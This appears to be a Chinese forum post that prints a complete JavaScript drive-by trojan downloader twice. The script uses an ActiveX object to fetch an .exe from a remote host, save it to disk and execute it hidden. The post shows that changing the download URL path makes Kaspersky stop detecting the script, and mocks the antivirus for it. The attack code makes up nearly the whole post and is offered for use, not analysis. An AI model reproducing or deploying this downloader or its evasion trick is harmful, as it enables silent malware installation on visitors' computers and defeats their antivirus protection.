<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var ailian,chulanfeng;ailian=\"http://www.***.com/muma/muma.exe\";chulanfeng=\"Microsoft.com\";try{var ado=(document.createElement(\"
object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.Create
Object(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.create
object(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(chulanfeng,2);as.close();var shell=ado.create
object(\"Shell.Application\",\"\");shell.Shellexecute(chulanfeng,\"\",\"\",\"open\",0);}catch(e){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.
onload = init;</script>
将以上一段文字保存为文本文档,卡巴立刻提示
检测到:木马程序 Trojan-Downloader.JS.Psyme.ps 文件: C:\Documents and Settings\ztuser\桌面\06014.htm
下面我们对其进行一出小小的修改:
将http://www.***.com/muma/muma.exe
换成http://www.***.com/1/1.exe
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var ailian,chulanfeng;ailian=\"http://www.***.com/1/1.exe\";chulanfeng=\"Microsoft.com\";try{var ado=(document.createElement(\"
object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.Create
Object(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.create
object(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(chulanfeng,2);as.close();var shell=ado.create
object(\"Shell.Application\",\"\");shell.Shellexecute(chulanfeng,\"\",\"\",\"open\",0);}catch(e){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.
onload = init;</script>
再看卡巴,就变成彻底的哑巴了。怎么扫都没反应。
所以我们说,卡巴不愧为世界头号杀软。处理病毒的确有自己独到之处。
qwreyyyt
10.12
[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)